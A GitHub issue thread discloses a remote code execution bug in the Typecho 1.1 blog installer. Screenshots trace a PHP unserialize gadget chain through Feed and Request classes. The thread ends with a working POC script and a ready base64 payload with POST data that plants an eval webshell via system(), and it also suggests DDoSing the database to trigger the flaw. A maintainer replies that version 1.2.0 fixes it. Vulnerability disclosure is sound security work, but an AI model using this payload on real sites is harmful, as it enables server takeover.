### ISSUE TITLE
the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability

### ISSUE THREAD

**Issue by youyou-pm10** [typecho/typecho#1523]
## List of Vulnerable path 
Vulnerable path /install.php
Lines 60-69 of the "install.php" catch the error but do nothing,so bypass the line 65's "exit".
![code.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673534639199-b776dcae-a81b-40e7-bbd5-42d650658711.png#averageHue=%232f3234&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u9be0caf3&margin=%5Bobject%20Object%5D&name=code.png&originHeight=1018&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=247866&status=done&style=none&taskId=u3f1791b3-8209-4486-85ad-6ea8ea21489&title=)
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.
We can simulate this situation by breakpoint debugging.Set the breakpoint on the line 60,then cut off the connection with the database.(such as phpstorm + phpstudy and so on)
![net.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673534738026-777a0189-6691-4aaf-8ad8-e61b5a821c65.png#averageHue=%23fdfbfa&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u094ee98d&margin=%5Bobject%20Object%5D&name=net.png&originHeight=41&originWidth=471&originalType=binary&ratio=1&rotation=0&showTitle=false&size=1972&status=done&style=none&taskId=u933bc544-f0c9-4f70-8e0e-13587c9ae97&title=)
![debug.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673534649540-60247083-5e32-4c5c-8d8f-568eede4c663.png#averageHue=%2333373a&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u3cc84aa3&margin=%5Bobject%20Object%5D&name=debug.png&originHeight=1017&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=249981&status=done&style=none&taskId=ud7e88089-443f-4cf5-86f2-09fb87449f1&title=)
Lines 74-87 of the "install.php",we can fake the reffer bypass the second "exit".we can set the reffer "[http://localhost/](http://localhost/)".
![reffer.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673534159432-8b4c37e1-58e3-4938-9b73-578a54b7d373.png#averageHue=%232f3233&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uab1efec3&margin=%5Bobject%20Object%5D&name=reffer.png&originHeight=1000&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=220866&status=done&style=none&taskId=u6b45049d-de15-4626-8f63-2212ea85f84&title=)
Line 291 of the "install.php" has a function "unserialize",it can be exploited maliciously.
The parameters come from line 83 of the "/var/Typecho/Cookie.php".
![unserialize0.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535008370-7530906a-59e1-45ab-944b-67e9d070af2b.png#averageHue=%23323537&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uf8c4f4e5&margin=%5Bobject%20Object%5D&name=unserialize0.png&originHeight=1015&originWidth=1918&originalType=binary&ratio=1&rotation=0&showTitle=false&size=285698&status=done&style=none&taskId=uc97423a8-2578-407b-b6b6-a52c513d063&title=)
Line 420 of the "install.php" triggeres function "__toString".
Line 223 of the "/var/Typecho/Feed.php" has function "__toString"
![toString1.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535234178-d6461d9f-fd3f-45df-8609-bc0d0a29c252.png#averageHue=%232f3233&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ua0c586f6&margin=%5Bobject%20Object%5D&name=toString1.png&originHeight=1015&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=270159&status=done&style=none&taskId=u5dc0eaa4-7d65-4f52-b3d0-97f13b7e2da&title=)
![toString2.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535242590-64634ce0-8633-4036-a10f-21f45ce6e9b2.png#averageHue=%23303435&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ub0ae4092&margin=%5Bobject%20Object%5D&name=toString2.png&originHeight=1015&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=237439&status=done&style=none&taskId=ub70534a2-0874-4ab4-b92d-5e455415b3c&title=)
![toString3.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535249254-0ff82457-0cad-4ee7-9750-0cf9c406a8b3.png#averageHue=%23313436&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u690aeead&margin=%5Bobject%20Object%5D&name=toString3.png&originHeight=1008&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=298418&status=done&style=none&taskId=u0fafe081-0e23-4bab-a331-1741fde1e23&title=)
Line 290 of the "/var/Typecho/Feed.php" triggeres function "__get".
Line 270 of the "/var/Typecho/Request.php" has function "__get"
![get1.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535369082-d5335108-9fb3-4aa7-b961-905b286a1a2a.png#averageHue=%232e3132&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u4000b939&margin=%5Bobject%20Object%5D&name=get1.png&originHeight=1000&originWidth=1917&originalType=binary&ratio=1&rotation=0&showTitle=false&size=229118&status=done&style=none&taskId=uaa90d6fe-047c-476f-8a19-d99c87419b6&title=)
![get2.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535374803-397ced0e-00c8-4199-ac77-86e82c2d9123.png#averageHue=%232e3133&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u85b5b7e4&margin=%5Bobject%20Object%5D&name=get2.png&originHeight=1017&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=244773&status=done&style=none&taskId=u0fd3834f-ff25-4080-ab21-d19c84c1fc8&title=)
![get3.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535378854-c7c2072b-a0db-4794-8897-1c0f844ea373.png#averageHue=%232f3233&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uf2bf0616&margin=%5Bobject%20Object%5D&name=get3.png&originHeight=1015&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=231996&status=done&style=none&taskId=u1bea5f88-bc10-4fd5-9917-7c3da514d3d&title=)
We can exploit function "call_user_func" to Remote Code Execute.
## Vulnerability exploitation process:
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.Of course,we can send network packets repeatedly to wait for it.
![ok.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535698775-bb0d3992-ea57-4805-b465-20e28aeab589.png#averageHue=%23f0dfcb&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u73a2cf79&margin=%5Bobject%20Object%5D&name=ok.png&originHeight=1017&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=201344&status=done&style=none&taskId=u1f021f7e-42cc-42bc-bfab-819bf4f86b1&title=)
The "ok" will be sent if it is success because of the POC.Then test the webshell.
![info.png](https://cdn.nlark.com/yuque/0/2023/png/29671361/1673535774205-33bbbc54-ea5c-4134-a04b-883da64819be.png#averageHue=%23f0efef&clientId=u69293b9f-2cca-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u310efdbd&margin=%5Bobject%20Object%5D&name=info.png&originHeight=1005&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=147877&status=done&style=none&taskId=ud8607dae-5b6e-4b4f-adc2-bd30b10a57b&title=)

## POC code:
```php
<?php
class Typecho_Request{
    private $_params= array('screenName'=> 'php -r "echo \'ok\';file_put_contents(\'cmd.php\', \'<?php eval($_POST[\"youyou\"]); ?>\');"');
    private $_filter= array('system');
}
class Typecho_Feed{
    private $_items=array();
    private $_type='ATOM 1.0';
    public function __construct()
    {
        $items['author']=new Typecho_Request();
        $this->_items[0]=$items;
    }
}
$config['prefix'] = new Typecho_Feed();;
$payload = base64_encode(serialize($config));
echo $payload;

```
```php
URL: http://localhost/install.php?start=1
POST Data: delete=true&__typecho_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0=
Reffer: http://localhost/
```

**Comment by myaijarvis** [comment]
very good！

**Comment by joyqi** [comment]
We have fixed this issue in 1.2.0.
